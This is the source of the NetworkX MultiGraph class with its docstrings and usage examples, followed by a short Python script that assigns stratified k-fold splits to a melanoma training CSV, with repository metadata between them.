from networkx.classes.coreviews import MultiAdjacencyView
from networkx.classes.reportviews import MultiEdgeView, MultiDegreeView
from networkx import NetworkXError
class MultiGraph(Graph):
"""
An undirected graph class that can store multiedges.
Multiedges are multiple edges between two nodes. Each edge
can hold optional data or attributes.
A MultiGraph holds undirected edges. Self loops are allowed.
Nodes can be arbitrary (hashable) Python objects with optional
key/value attributes. By convention `None` is not used as a node.
Edges are represented as links between nodes with optional
key/value attributes.
Parameters
----------
incoming_graph_data : input graph (optional, default: None)
Data to initialize graph. If None (default) an empty
graph is created. The data can be any format that is supported
by the to_networkx_graph() function, currently including edge list,
dict of dicts, dict of lists, NetworkX graph, NumPy matrix
or 2d ndarray, SciPy sparse matrix, or PyGraphviz graph.
attr : keyword arguments, optional (default= no attributes)
Attributes to add to graph as key=value pairs.
See Also
--------
Graph
DiGraph
MultiDiGraph
OrderedMultiGraph
Examples
--------
Create an empty graph structure (a "null graph") with no nodes and
no edges.
>>> G = nx.MultiGraph()
G can be grown in several ways.
**Nodes:**
Add one node at a time:
>>> G.add_node(1)
Add the nodes from any container (a list, dict, set or
even the lines from a file or the nodes from another graph).
>>> G.add_nodes_from([2, 3])
>>> G.add_nodes_from(range(100, 110))
>>> H = nx.path_graph(10)
>>> G.add_nodes_from(H)
In addition to strings and integers any hashable Python object
(except None) can represent a node, e.g. a customized node object,
or even another Graph.
>>> G.add_node(H)
**Edges:**
G can also be grown by adding edges.
Add one edge,
>>> key = G.add_edge(1, 2)
a list of edges,
>>> keys = G.add_edges_from([(1, 2), (1, 3)])
or a collection of edges,
>>> keys = G.add_edges_from(H.edges)
If some edges connect nodes not yet in the graph, the nodes
are added automatically. If an edge already exists, an additional
edge is created and stored using a key to identify the edge.
By default the key is the lowest unused integer.
>>> keys = G.add_edges_from([(4, 5, {"route": 28}), (4, 5, {"route": 37})])
>>> G[4]
AdjacencyView({3: {0: {}}, 5: {0: {}, 1: {'route': 28}, 2: {'route': 37}}})
**Attributes:**
Each graph, node, and edge can hold key/value attribute pairs
in an associated attribute dictionary (the keys must be hashable).
By default these are empty, but can be added or changed using
add_edge, add_node or direct manipulation of the attribute
dictionaries named graph, node and edge respectively.
>>> G = nx.MultiGraph(day="Friday")
>>> G.graph
{'day': 'Friday'}
Add node attributes using add_node(), add_nodes_from() or G.nodes
>>> G.add_node(1, time="5pm")
>>> G.add_nodes_from([3], time="2pm")
>>> G.nodes[1]
{'time': '5pm'}
>>> G.nodes[1]["room"] = 714
>>> del G.nodes[1]["room"] # remove attribute
>>> list(G.nodes(data=True))
[(1, {'time': '5pm'}), (3, {'time': '2pm'})]
Add edge attributes using add_edge(), add_edges_from(), subscript
notation, or G.edges.
>>> key = G.add_edge(1, 2, weight=4.7)
>>> keys = G.add_edges_from([(3, 4), (4, 5)], color="red")
>>> keys = G.add_edges_from([(1, 2, {"color": "blue"}), (2, 3, {"weight": 8})])
>>> G[1][2][0]["weight"] = 4.7
>>> G.edges[1, 2, 0]["weight"] = 4
Warning: we protect the graph data structure by making `G.edges[1, 2]` a
read-only dict-like structure. However, you can assign to attributes
in e.g. `G.edges[1, 2]`. Thus, use 2 sets of brackets to add/change
data attributes: `G.edges[1, 2]['weight'] = 4`
(For multigraphs: `MG.edges[u, v, key][name] = value`).
**Shortcuts:**
Many common graph features allow python syntax to speed reporting.
>>> 1 in G # check if node in graph
True
>>> [n for n in G if n < 3] # iterate through nodes
[1, 2]
>>> len(G) # number of nodes in graph
5
>>> G[1] # adjacency dict-like view keyed by neighbor to edge attributes
AdjacencyView({2: {0: {'weight': 4}, 1: {'color': 'blue'}}})
Often the best way to traverse all edges of a graph is via the neighbors.
The neighbors are reported as an adjacency-dict `G.adj` or `G.adjacency()`.
>>> for n, nbrsdict in G.adjacency():
... for nbr, keydict in nbrsdict.items():
... for key, eattr in keydict.items():
... if "weight" in eattr:
... # Do something useful with the edges
... pass
But the edges() method is often more convenient:
>>> for u, v, keys, weight in G.edges(data="weight", keys=True):
... if weight is not None:
... # Do something useful with the edges
... pass
**Reporting:**
Simple graph information is obtained using methods and object-attributes.
Reporting usually provides views instead of containers to reduce memory
usage. The views update as the graph is updated similarly to dict-views.
    The objects `nodes`, `edges` and `adj` provide access to data attributes
    via lookup (e.g. `nodes[n]`, `edges[u, v]`, `adj[u][v]`) and iteration
(e.g. `nodes.items()`, `nodes.data('color')`,
`nodes.data('color', default='blue')` and similarly for `edges`)
Views exist for `nodes`, `edges`, `neighbors()`/`adj` and `degree`.
For details on these and other miscellaneous methods, see below.
**Subclasses (Advanced):**
The MultiGraph class uses a dict-of-dict-of-dict-of-dict data structure.
The outer dict (node_dict) holds adjacency information keyed by node.
The next dict (adjlist_dict) represents the adjacency information and holds
edge_key dicts keyed by neighbor. The edge_key dict holds each edge_attr
dict keyed by edge key. The inner dict (edge_attr_dict) represents
the edge data and holds edge attribute values keyed by attribute names.
Each of these four dicts in the dict-of-dict-of-dict-of-dict
structure can be replaced by a user defined dict-like object.
In general, the dict-like features should be maintained but
extra features can be added. To replace one of the dicts create
a new graph class by changing the class(!) variable holding the
factory for that dict-like structure. The variable names are
node_dict_factory, node_attr_dict_factory, adjlist_inner_dict_factory,
adjlist_outer_dict_factory, edge_key_dict_factory, edge_attr_dict_factory
and graph_attr_dict_factory.
node_dict_factory : function, (default: dict)
Factory function to be used to create the dict containing node
attributes, keyed by node id.
It should require no arguments and return a dict-like object
node_attr_dict_factory: function, (default: dict)
Factory function to be used to create the node attribute
dict which holds attribute values keyed by attribute name.
It should require no arguments and return a dict-like object
adjlist_outer_dict_factory : function, (default: dict)
Factory function to be used to create the outer-most dict
in the data structure that holds adjacency info keyed by node.
It should require no arguments and return a dict-like object.
adjlist_inner_dict_factory : function, (default: dict)
Factory function to be used to create the adjacency list
dict which holds multiedge key dicts keyed by neighbor.
It should require no arguments and return a dict-like object.
edge_key_dict_factory : function, (default: dict)
Factory function to be used to create the edge key dict
which holds edge data keyed by edge key.
It should require no arguments and return a dict-like object.
edge_attr_dict_factory : function, (default: dict)
Factory function to be used to create the edge attribute
dict which holds attribute values keyed by attribute name.
It should require no arguments and return a dict-like object.
graph_attr_dict_factory : function, (default: dict)
Factory function to be used to create the graph attribute
dict which holds attribute values keyed by attribute name.
It should require no arguments and return a dict-like object.
Typically, if your extension doesn't impact the data structure all
methods will inherited without issue except: `to_directed/to_undirected`.
By default these methods create a DiGraph/Graph class and you probably
want them to create your extension of a DiGraph/Graph. To facilitate
this we define two class variables that you can set in your subclass.
to_directed_class : callable, (default: DiGraph or MultiDiGraph)
Class to create a new graph structure in the `to_directed` method.
If `None`, a NetworkX class (DiGraph or MultiDiGraph) is used.
to_undirected_class : callable, (default: Graph or MultiGraph)
Class to create a new graph structure in the `to_undirected` method.
If `None`, a NetworkX class (Graph or MultiGraph) is used.
Please see :mod:`~networkx.classes.ordered` for examples of
creating graph subclasses by overwriting the base class `dict` with
a dictionary-like object.
"""
# node_dict_factory = dict # already assigned in Graph
# adjlist_outer_dict_factory = dict
# adjlist_inner_dict_factory = dict
edge_key_dict_factory = dict
# edge_attr_dict_factory = dict
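    # Illustrative subclassing sketch: a subclass that keeps multiedge keys in
    # insertion order could simply override the factory, e.g.
    #     edge_key_dict_factory = collections.OrderedDict
    # on the subclass; everything else is inherited from MultiGraph unchanged.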
def to_directed_class(self):
"""Returns the class to use for empty directed copies.
If you subclass the base classes, use this to designate
what directed class to use for `to_directed()` copies.
"""
return nx.MultiDiGraph
def to_undirected_class(self):
"""Returns the class to use for empty undirected copies.
If you subclass the base classes, use this to designate
        what undirected class to use for `to_undirected()` copies.
"""
return MultiGraph
def __init__(self, incoming_graph_data=None, **attr):
"""Initialize a graph with edges, name, or graph attributes.
Parameters
----------
incoming_graph_data : input graph
Data to initialize graph. If incoming_graph_data=None (default)
an empty graph is created. The data can be an edge list, or any
NetworkX graph object. If the corresponding optional Python
packages are installed the data can also be a NumPy matrix
or 2d ndarray, a SciPy sparse matrix, or a PyGraphviz graph.
attr : keyword arguments, optional (default= no attributes)
Attributes to add to graph as key=value pairs.
See Also
--------
convert
Examples
--------
>>> G = nx.Graph() # or DiGraph, MultiGraph, MultiDiGraph, etc
>>> G = nx.Graph(name="my graph")
>>> e = [(1, 2), (2, 3), (3, 4)] # list of edges
>>> G = nx.Graph(e)
Arbitrary graph attribute pairs (key=value) may be assigned
>>> G = nx.Graph(e, day="Friday")
>>> G.graph
{'day': 'Friday'}
"""
self.edge_key_dict_factory = self.edge_key_dict_factory
Graph.__init__(self, incoming_graph_data, **attr)
@property
def adj(self):
"""Graph adjacency object holding the neighbors of each node.
This object is a read-only dict-like structure with node keys
and neighbor-dict values. The neighbor-dict is keyed by neighbor
to the edgekey-data-dict. So `G.adj[3][2][0]['color'] = 'blue'` sets
the color of the edge `(3, 2, 0)` to `"blue"`.
Iterating over G.adj behaves like a dict. Useful idioms include
`for nbr, nbrdict in G.adj[n].items():`.
The neighbor information is also provided by subscripting the graph.
So `for nbr, foovalue in G[node].data('foo', default=1):` works.
For directed graphs, `G.adj` holds outgoing (successor) info.
"""
return MultiAdjacencyView(self._adj)
def new_edge_key(self, u, v):
"""Returns an unused key for edges between nodes `u` and `v`.
The nodes `u` and `v` do not need to be already in the graph.
Notes
-----
In the standard MultiGraph class the new key is the number of existing
edges between `u` and `v` (increased if necessary to ensure unused).
The first edge will have key 0, then 1, etc. If an edge is removed
further new_edge_keys may not be in this order.
Parameters
----------
u, v : nodes
Returns
-------
key : int
"""
try:
keydict = self._adj[u][v]
except KeyError:
return 0
key = len(keydict)
while key in keydict:
key += 1
return key
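        # For example, on a fresh MultiGraph, add_edge(0, 1) stores key 0, a second
        # add_edge(0, 1) stores key 1, and new_edge_key(0, 1) then returns 2.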
def add_edge(self, u_for_edge, v_for_edge, key=None, **attr):
"""Add an edge between u and v.
The nodes u and v will be automatically added if they are
not already in the graph.
Edge attributes can be specified with keywords or by directly
accessing the edge's attribute dictionary. See examples below.
Parameters
----------
u_for_edge, v_for_edge : nodes
Nodes can be, for example, strings or numbers.
Nodes must be hashable (and not None) Python objects.
key : hashable identifier, optional (default=lowest unused integer)
Used to distinguish multiedges between a pair of nodes.
attr : keyword arguments, optional
Edge data (or labels or objects) can be assigned using
keyword arguments.
Returns
-------
The edge key assigned to the edge.
See Also
--------
add_edges_from : add a collection of edges
Notes
-----
To replace/update edge data, use the optional key argument
to identify a unique edge. Otherwise a new edge will be created.
NetworkX algorithms designed for weighted graphs cannot use
multigraphs directly because it is not clear how to handle
multiedge weights. Convert to Graph using edge attribute
'weight' to enable weighted graph algorithms.
Default keys are generated using the method `new_edge_key()`.
This method can be overridden by subclassing the base class and
providing a custom `new_edge_key()` method.
Examples
--------
The following all add the edge e=(1, 2) to graph G:
>>> G = nx.MultiGraph()
>>> e = (1, 2)
>>> ekey = G.add_edge(1, 2) # explicit two-node form
>>> G.add_edge(*e) # single edge as tuple of two nodes
1
>>> G.add_edges_from([(1, 2)]) # add edges from iterable container
[2]
Associate data to edges using keywords:
>>> ekey = G.add_edge(1, 2, weight=3)
>>> ekey = G.add_edge(1, 2, key=0, weight=4) # update data for key=0
>>> ekey = G.add_edge(1, 3, weight=7, capacity=15, length=342.7)
For non-string attribute keys, use subscript notation.
>>> ekey = G.add_edge(1, 2)
>>> G[1][2][0].update({0: 5})
>>> G.edges[1, 2, 0].update({0: 5})
"""
u, v = u_for_edge, v_for_edge
# add nodes
if u not in self._adj:
self._adj[u] = self.adjlist_inner_dict_factory()
self._node[u] = self.node_attr_dict_factory()
if v not in self._adj:
self._adj[v] = self.adjlist_inner_dict_factory()
self._node[v] = self.node_attr_dict_factory()
if key is None:
key = self.new_edge_key(u, v)
if v in self._adj[u]:
keydict = self._adj[u][v]
datadict = keydict.get(key, self.edge_attr_dict_factory())
datadict.update(attr)
keydict[key] = datadict
else:
# selfloops work this way without special treatment
datadict = self.edge_attr_dict_factory()
datadict.update(attr)
keydict = self.edge_key_dict_factory()
keydict[key] = datadict
self._adj[u][v] = keydict
self._adj[v][u] = keydict
return key
def add_edges_from(self, ebunch_to_add, **attr):
"""Add all the edges in ebunch_to_add.
Parameters
----------
ebunch_to_add : container of edges
Each edge given in the container will be added to the
graph. The edges can be:
- 2-tuples (u, v) or
- 3-tuples (u, v, d) for an edge data dict d, or
- 3-tuples (u, v, k) for not iterable key k, or
- 4-tuples (u, v, k, d) for an edge with data and key k
attr : keyword arguments, optional
Edge data (or labels or objects) can be assigned using
keyword arguments.
Returns
-------
A list of edge keys assigned to the edges in `ebunch`.
See Also
--------
add_edge : add a single edge
add_weighted_edges_from : convenient way to add weighted edges
Notes
-----
Adding the same edge twice has no effect but any edge data
will be updated when each duplicate edge is added.
Edge attributes specified in an ebunch take precedence over
attributes specified via keyword arguments.
Default keys are generated using the method ``new_edge_key()``.
This method can be overridden by subclassing the base class and
providing a custom ``new_edge_key()`` method.
Examples
--------
>>> G = nx.Graph() # or DiGraph, MultiGraph, MultiDiGraph, etc
>>> G.add_edges_from([(0, 1), (1, 2)]) # using a list of edge tuples
>>> e = zip(range(0, 3), range(1, 4))
>>> G.add_edges_from(e) # Add the path graph 0-1-2-3
Associate data to edges
>>> G.add_edges_from([(1, 2), (2, 3)], weight=3)
>>> G.add_edges_from([(3, 4), (1, 4)], label="WN2898")
"""
keylist = []
for e in ebunch_to_add:
ne = len(e)
if ne == 4:
u, v, key, dd = e
elif ne == 3:
u, v, dd = e
key = None
elif ne == 2:
u, v = e
dd = {}
key = None
else:
msg = f"Edge tuple {e} must be a 2-tuple, 3-tuple or 4-tuple."
raise NetworkXError(msg)
ddd = {}
ddd.update(attr)
try:
ddd.update(dd)
except (TypeError, ValueError):
if ne != 3:
raise
key = dd # ne == 3 with 3rd value not dict, must be a key
key = self.add_edge(u, v, key)
self[u][v][key].update(ddd)
keylist.append(key)
return keylist
def remove_edge(self, u, v, key=None):
"""Remove an edge between u and v.
Parameters
----------
u, v : nodes
Remove an edge between nodes u and v.
key : hashable identifier, optional (default=None)
Used to distinguish multiple edges between a pair of nodes.
If None remove a single (arbitrary) edge between u and v.
Raises
------
NetworkXError
If there is not an edge between u and v, or
if there is no edge with the specified key.
See Also
--------
remove_edges_from : remove a collection of edges
Examples
--------
>>> G = nx.MultiGraph()
>>> nx.add_path(G, [0, 1, 2, 3])
>>> G.remove_edge(0, 1)
>>> e = (1, 2)
>>> G.remove_edge(*e) # unpacks e from an edge tuple
For multiple edges
>>> G = nx.MultiGraph() # or MultiDiGraph, etc
>>> G.add_edges_from([(1, 2), (1, 2), (1, 2)]) # key_list returned
[0, 1, 2]
>>> G.remove_edge(1, 2) # remove a single (arbitrary) edge
For edges with keys
>>> G = nx.MultiGraph() # or MultiDiGraph, etc
>>> G.add_edge(1, 2, key="first")
'first'
>>> G.add_edge(1, 2, key="second")
'second'
>>> G.remove_edge(1, 2, key="second")
"""
try:
d = self._adj[u][v]
except KeyError as e:
raise NetworkXError(f"The edge {u}-{v} is not in the graph.") from e
# remove the edge with specified data
if key is None:
d.popitem()
else:
try:
del d[key]
except KeyError as e:
msg = f"The edge {u}-{v} with key {key} is not in the graph."
raise NetworkXError(msg) from e
if len(d) == 0:
# remove the key entries if last edge
del self._adj[u][v]
if u != v: # check for selfloop
del self._adj[v][u]
def remove_edges_from(self, ebunch):
"""Remove all edges specified in ebunch.
Parameters
----------
ebunch: list or container of edge tuples
Each edge given in the list or container will be removed
from the graph. The edges can be:
- 2-tuples (u, v) All edges between u and v are removed.
- 3-tuples (u, v, key) The edge identified by key is removed.
- 4-tuples (u, v, key, data) where data is ignored.
See Also
--------
remove_edge : remove a single edge
Notes
-----
Will fail silently if an edge in ebunch is not in the graph.
Examples
--------
>>> G = nx.path_graph(4) # or DiGraph, MultiGraph, MultiDiGraph, etc
>>> ebunch = [(1, 2), (2, 3)]
>>> G.remove_edges_from(ebunch)
Removing multiple copies of edges
>>> G = nx.MultiGraph()
>>> keys = G.add_edges_from([(1, 2), (1, 2), (1, 2)])
>>> G.remove_edges_from([(1, 2), (1, 2)])
>>> list(G.edges())
[(1, 2)]
>>> G.remove_edges_from([(1, 2), (1, 2)]) # silently ignore extra copy
>>> list(G.edges) # now empty graph
[]
"""
for e in ebunch:
try:
self.remove_edge(*e[:3])
except NetworkXError:
pass
def has_edge(self, u, v, key=None):
"""Returns True if the graph has an edge between nodes u and v.
This is the same as `v in G[u] or key in G[u][v]`
without KeyError exceptions.
Parameters
----------
u, v : nodes
Nodes can be, for example, strings or numbers.
key : hashable identifier, optional (default=None)
If specified return True only if the edge with
key is found.
Returns
-------
edge_ind : bool
True if edge is in the graph, False otherwise.
Examples
--------
Can be called either using two nodes u, v, an edge tuple (u, v),
or an edge tuple (u, v, key).
>>> G = nx.MultiGraph() # or MultiDiGraph
>>> nx.add_path(G, [0, 1, 2, 3])
>>> G.has_edge(0, 1) # using two nodes
True
>>> e = (0, 1)
>>> G.has_edge(*e) # e is a 2-tuple (u, v)
True
>>> G.add_edge(0, 1, key="a")
'a'
>>> G.has_edge(0, 1, key="a") # specify key
True
>>> e = (0, 1, "a")
>>> G.has_edge(*e) # e is a 3-tuple (u, v, 'a')
True
The following syntax are equivalent:
>>> G.has_edge(0, 1)
True
>>> 1 in G[0] # though this gives :exc:`KeyError` if 0 not in G
True
"""
try:
if key is None:
return v in self._adj[u]
else:
return key in self._adj[u][v]
except KeyError:
return False
@property
def edges(self):
"""Returns an iterator over the edges.
edges(self, nbunch=None, data=False, keys=False, default=None)
The EdgeView provides set-like operations on the edge-tuples
as well as edge attribute lookup. When called, it also provides
an EdgeDataView object which allows control of access to edge
attributes (but does not provide set-like operations).
Hence, `G.edges[u, v]['color']` provides the value of the color
attribute for edge `(u, v)` while
`for (u, v, c) in G.edges(data='color', default='red'):`
iterates through all the edges yielding the color attribute.
Edges are returned as tuples with optional data and keys
in the order (node, neighbor, key, data).
Parameters
----------
nbunch : single node, container, or all nodes (default= all nodes)
The view will only report edges incident to these nodes.
data : string or bool, optional (default=False)
The edge attribute returned in 3-tuple (u, v, ddict[data]).
If True, return edge attribute dict in 3-tuple (u, v, ddict).
If False, return 2-tuple (u, v).
keys : bool, optional (default=False)
If True, return edge keys with each edge.
default : value, optional (default=None)
Value used for edges that don't have the requested attribute.
Only relevant if data is not True or False.
Returns
-------
edges : MultiEdgeView
A view of edge attributes, usually it iterates over (u, v)
(u, v, k) or (u, v, k, d) tuples of edges, but can also be
used for attribute lookup as `edges[u, v, k]['foo']`.
Notes
-----
Nodes in nbunch that are not in the graph will be (quietly) ignored.
For directed graphs this returns the out-edges.
Examples
--------
>>> G = nx.MultiGraph() # or MultiDiGraph
>>> nx.add_path(G, [0, 1, 2])
>>> key = G.add_edge(2, 3, weight=5)
>>> [e for e in G.edges()]
[(0, 1), (1, 2), (2, 3)]
>>> G.edges.data() # default data is {} (empty dict)
MultiEdgeDataView([(0, 1, {}), (1, 2, {}), (2, 3, {'weight': 5})])
>>> G.edges.data("weight", default=1)
MultiEdgeDataView([(0, 1, 1), (1, 2, 1), (2, 3, 5)])
>>> G.edges(keys=True) # default keys are integers
MultiEdgeView([(0, 1, 0), (1, 2, 0), (2, 3, 0)])
>>> G.edges.data(keys=True)
MultiEdgeDataView([(0, 1, 0, {}), (1, 2, 0, {}), (2, 3, 0, {'weight': 5})])
>>> G.edges.data("weight", default=1, keys=True)
MultiEdgeDataView([(0, 1, 0, 1), (1, 2, 0, 1), (2, 3, 0, 5)])
>>> G.edges([0, 3])
MultiEdgeDataView([(0, 1), (3, 2)])
>>> G.edges(0)
MultiEdgeDataView([(0, 1)])
"""
return MultiEdgeView(self)
def get_edge_data(self, u, v, key=None, default=None):
"""Returns the attribute dictionary associated with edge (u, v).
This is identical to `G[u][v][key]` except the default is returned
        instead of an exception if the edge doesn't exist.
Parameters
----------
u, v : nodes
default : any Python object (default=None)
Value to return if the edge (u, v) is not found.
key : hashable identifier, optional (default=None)
Return data only for the edge with specified key.
Returns
-------
edge_dict : dictionary
The edge attribute dictionary.
Examples
--------
>>> G = nx.MultiGraph() # or MultiDiGraph
>>> key = G.add_edge(0, 1, key="a", weight=7)
>>> G[0][1]["a"] # key='a'
{'weight': 7}
>>> G.edges[0, 1, "a"] # key='a'
{'weight': 7}
Warning: we protect the graph data structure by making
`G.edges` and `G[1][2]` read-only dict-like structures.
However, you can assign values to attributes in e.g.
`G.edges[1, 2, 'a']` or `G[1][2]['a']` using an additional
bracket as shown next. You need to specify all edge info
to assign to the edge data associated with an edge.
>>> G[0][1]["a"]["weight"] = 10
>>> G.edges[0, 1, "a"]["weight"] = 10
>>> G[0][1]["a"]["weight"]
10
>>> G.edges[1, 0, "a"]["weight"]
10
>>> G = nx.MultiGraph() # or MultiDiGraph
>>> nx.add_path(G, [0, 1, 2, 3])
>>> G.get_edge_data(0, 1)
{0: {}}
>>> e = (0, 1)
>>> G.get_edge_data(*e) # tuple form
{0: {}}
>>> G.get_edge_data("a", "b", default=0) # edge not in graph, return 0
0
"""
try:
if key is None:
return self._adj[u][v]
else:
return self._adj[u][v][key]
except KeyError:
return default
@property
def degree(self):
"""A DegreeView for the Graph as G.degree or G.degree().
The node degree is the number of edges adjacent to the node.
The weighted node degree is the sum of the edge weights for
edges incident to that node.
This object provides an iterator for (node, degree) as well as
lookup for the degree for a single node.
Parameters
----------
nbunch : single node, container, or all nodes (default= all nodes)
The view will only report edges incident to these nodes.
weight : string or None, optional (default=None)
The name of an edge attribute that holds the numerical value used
as a weight. If None, then each edge has weight 1.
The degree is the sum of the edge weights adjacent to the node.
Returns
-------
If a single node is requested
deg : int
Degree of the node, if a single node is passed as argument.
OR if multiple nodes are requested
nd_iter : iterator
The iterator returns two-tuples of (node, degree).
Examples
--------
>>> G = nx.Graph() # or DiGraph, MultiGraph, MultiDiGraph, etc
>>> nx.add_path(G, [0, 1, 2, 3])
>>> G.degree(0) # node 0 with degree 1
1
>>> list(G.degree([0, 1]))
[(0, 1), (1, 2)]
"""
return MultiDegreeView(self)
def is_multigraph(self):
"""Returns True if graph is a multigraph, False otherwise."""
return True
def is_directed(self):
"""Returns True if graph is directed, False otherwise."""
return False
def copy(self, as_view=False):
"""Returns a copy of the graph.
The copy method by default returns an independent shallow copy
of the graph and attributes. That is, if an attribute is a
        container, that container is shared by the original and the copy.
Use Python's `copy.deepcopy` for new containers.
If `as_view` is True then a view is returned instead of a copy.
Notes
-----
All copies reproduce the graph structure, but data attributes
may be handled in different ways. There are four types of copies
of a graph that people might want.
Deepcopy -- A "deepcopy" copies the graph structure as well as
all data attributes and any objects they might contain.
The entire graph object is new so that changes in the copy
do not affect the original object. (see Python's copy.deepcopy)
Data Reference (Shallow) -- For a shallow copy the graph structure
is copied but the edge, node and graph attribute dicts are
references to those in the original graph. This saves
time and memory but could cause confusion if you change an attribute
in one graph and it changes the attribute in the other.
NetworkX does not provide this level of shallow copy.
Independent Shallow -- This copy creates new independent attribute
dicts and then does a shallow copy of the attributes. That is, any
attributes that are containers are shared between the new graph
and the original. This is exactly what `dict.copy()` provides.
You can obtain this style copy using:
>>> G = nx.path_graph(5)
>>> H = G.copy()
>>> H = G.copy(as_view=False)
>>> H = nx.Graph(G)
>>> H = G.__class__(G)
Fresh Data -- For fresh data, the graph structure is copied while
new empty data attribute dicts are created. The resulting graph
is independent of the original and it has no edge, node or graph
attributes. Fresh copies are not enabled. Instead use:
>>> H = G.__class__()
>>> H.add_nodes_from(G)
>>> H.add_edges_from(G.edges)
View -- Inspired by dict-views, graph-views act like read-only
versions of the original graph, providing a copy of the original
structure without requiring any memory for copying the information.
See the Python copy module for more information on shallow
and deep copies, https://docs.python.org/3/library/copy.html.
Parameters
----------
as_view : bool, optional (default=False)
If True, the returned graph-view provides a read-only view
of the original graph without actually copying any data.
Returns
-------
G : Graph
A copy of the graph.
See Also
--------
to_directed: return a directed copy of the graph.
Examples
--------
>>> G = nx.path_graph(4) # or DiGraph, MultiGraph, MultiDiGraph, etc
>>> H = G.copy()
"""
if as_view is True:
return nx.graphviews.generic_graph_view(self)
G = self.__class__()
G.graph.update(self.graph)
G.add_nodes_from((n, d.copy()) for n, d in self._node.items())
G.add_edges_from(
(u, v, key, datadict.copy())
for u, nbrs in self._adj.items()
for v, keydict in nbrs.items()
for key, datadict in keydict.items()
)
return G
def to_directed(self, as_view=False):
"""Returns a directed representation of the graph.
Returns
-------
G : MultiDiGraph
A directed graph with the same name, same nodes, and with
each edge (u, v, data) replaced by two directed edges
(u, v, data) and (v, u, data).
Notes
-----
This returns a "deepcopy" of the edge, node, and
graph attributes which attempts to completely copy
all of the data and references.
This is in contrast to the similar D=DiGraph(G) which returns a
shallow copy of the data.
See the Python copy module for more information on shallow
and deep copies, https://docs.python.org/3/library/copy.html.
Warning: If you have subclassed MultiGraph to use dict-like objects
in the data structure, those changes do not transfer to the
MultiDiGraph created by this method.
Examples
--------
>>> G = nx.Graph() # or MultiGraph, etc
>>> G.add_edge(0, 1)
>>> H = G.to_directed()
>>> list(H.edges)
[(0, 1), (1, 0)]
If already directed, return a (deep) copy
>>> G = nx.DiGraph() # or MultiDiGraph, etc
>>> G.add_edge(0, 1)
>>> H = G.to_directed()
>>> list(H.edges)
[(0, 1)]
"""
graph_class = self.to_directed_class()
if as_view is True:
return nx.graphviews.generic_graph_view(self, graph_class)
# deepcopy when not a view
G = graph_class()
G.graph.update(deepcopy(self.graph))
G.add_nodes_from((n, deepcopy(d)) for n, d in self._node.items())
G.add_edges_from(
(u, v, key, deepcopy(datadict))
for u, nbrs in self.adj.items()
for v, keydict in nbrs.items()
for key, datadict in keydict.items()
)
return G
def to_undirected(self, as_view=False):
"""Returns an undirected copy of the graph.
Returns
-------
G : Graph/MultiGraph
A deepcopy of the graph.
See Also
--------
copy, add_edge, add_edges_from
Notes
-----
This returns a "deepcopy" of the edge, node, and
graph attributes which attempts to completely copy
all of the data and references.
This is in contrast to the similar `G = nx.MultiGraph(D)`
which returns a shallow copy of the data.
See the Python copy module for more information on shallow
and deep copies, https://docs.python.org/3/library/copy.html.
        Warning: If you have subclassed MultiGraph to use dict-like
objects in the data structure, those changes do not transfer
to the MultiGraph created by this method.
Examples
--------
>>> G = nx.path_graph(2) # or MultiGraph, etc
>>> H = G.to_directed()
>>> list(H.edges)
[(0, 1), (1, 0)]
>>> G2 = H.to_undirected()
>>> list(G2.edges)
[(0, 1)]
"""
graph_class = self.to_undirected_class()
if as_view is True:
return nx.graphviews.generic_graph_view(self, graph_class)
# deepcopy when not a view
G = graph_class()
G.graph.update(deepcopy(self.graph))
G.add_nodes_from((n, deepcopy(d)) for n, d in self._node.items())
G.add_edges_from(
(u, v, key, deepcopy(datadict))
for u, nbrs in self._adj.items()
for v, keydict in nbrs.items()
for key, datadict in keydict.items()
)
return G
def number_of_edges(self, u=None, v=None):
"""Returns the number of edges between two nodes.
Parameters
----------
        u, v : nodes, optional (default=all edges)
If u and v are specified, return the number of edges between
u and v. Otherwise return the total number of all edges.
Returns
-------
nedges : int
The number of edges in the graph. If nodes `u` and `v` are
specified return the number of edges between those nodes. If
the graph is directed, this only returns the number of edges
from `u` to `v`.
See Also
--------
size
Examples
--------
For undirected multigraphs, this method counts the total number
of edges in the graph::
>>> G = nx.MultiGraph()
>>> G.add_edges_from([(0, 1), (0, 1), (1, 2)])
[0, 1, 0]
>>> G.number_of_edges()
3
If you specify two nodes, this counts the total number of edges
joining the two nodes::
>>> G.number_of_edges(0, 1)
2
For directed multigraphs, this method can count the total number
of directed edges from `u` to `v`::
>>> G = nx.MultiDiGraph()
>>> G.add_edges_from([(0, 1), (0, 1), (1, 0)])
[0, 1, 0]
>>> G.number_of_edges(0, 1)
2
>>> G.number_of_edges(1, 0)
1
"""
if u is None:
return self.size()
try:
edgedata = self._adj[u][v]
except KeyError:
return 0 # no such edge
return len(edgedata)
| 35.548587
| 83
| 0.578763
|
7cf75211f74cde224dcc6e415965fb0b988a7ec2
| 539
|
py
|
Python
|
Melanoma/create_folds.py
|
Akashcba/VSCode
|
5eb4b737e6e775e7415c8baa4ff2d7e94fa8dceb
|
[
"MIT"
] | null | null | null |
Melanoma/create_folds.py
|
Akashcba/VSCode
|
5eb4b737e6e775e7415c8baa4ff2d7e94fa8dceb
|
[
"MIT"
] | null | null | null |
Melanoma/create_folds.py
|
Akashcba/VSCode
|
5eb4b737e6e775e7415c8baa4ff2d7e94fa8dceb
|
[
"MIT"
] | null | null | null |
import os
import pandas as pd
from sklearn import model_selection
# NOTE: placeholder paths; adjust these to the actual dataset location.
INPUT_PATH = "input"
TRAIN_DATA = os.path.join(INPUT_PATH, "train.csv")
if __name__ == "__main__":
    df = pd.read_csv(TRAIN_DATA)
    ## Creating the folds
    df["kfold"] = -1
    # shuffle the rows before assigning folds
    df = df.sample(frac=1).reset_index(drop=True)
    y = df.target.values
    kf = model_selection.StratifiedKFold(n_splits=5)
    ## Begin Splitting
    # tag each row of the validation split with its fold index
    for fold_, (_, valid_idx) in enumerate(kf.split(X=df, y=y)):
        df.loc[valid_idx, "kfold"] = fold_
    df.to_csv(os.path.join(INPUT_PATH, "train_folds.csv"), index=False)
    print("\nFolds Successfully Created ...\n")
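# After this runs, train_folds.csv holds the original columns plus a "kfold"
# column with values 0-4; StratifiedKFold keeps the class balance of `target`
# roughly equal across the five folds.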
| 29.944444
| 71
| 0.662338
|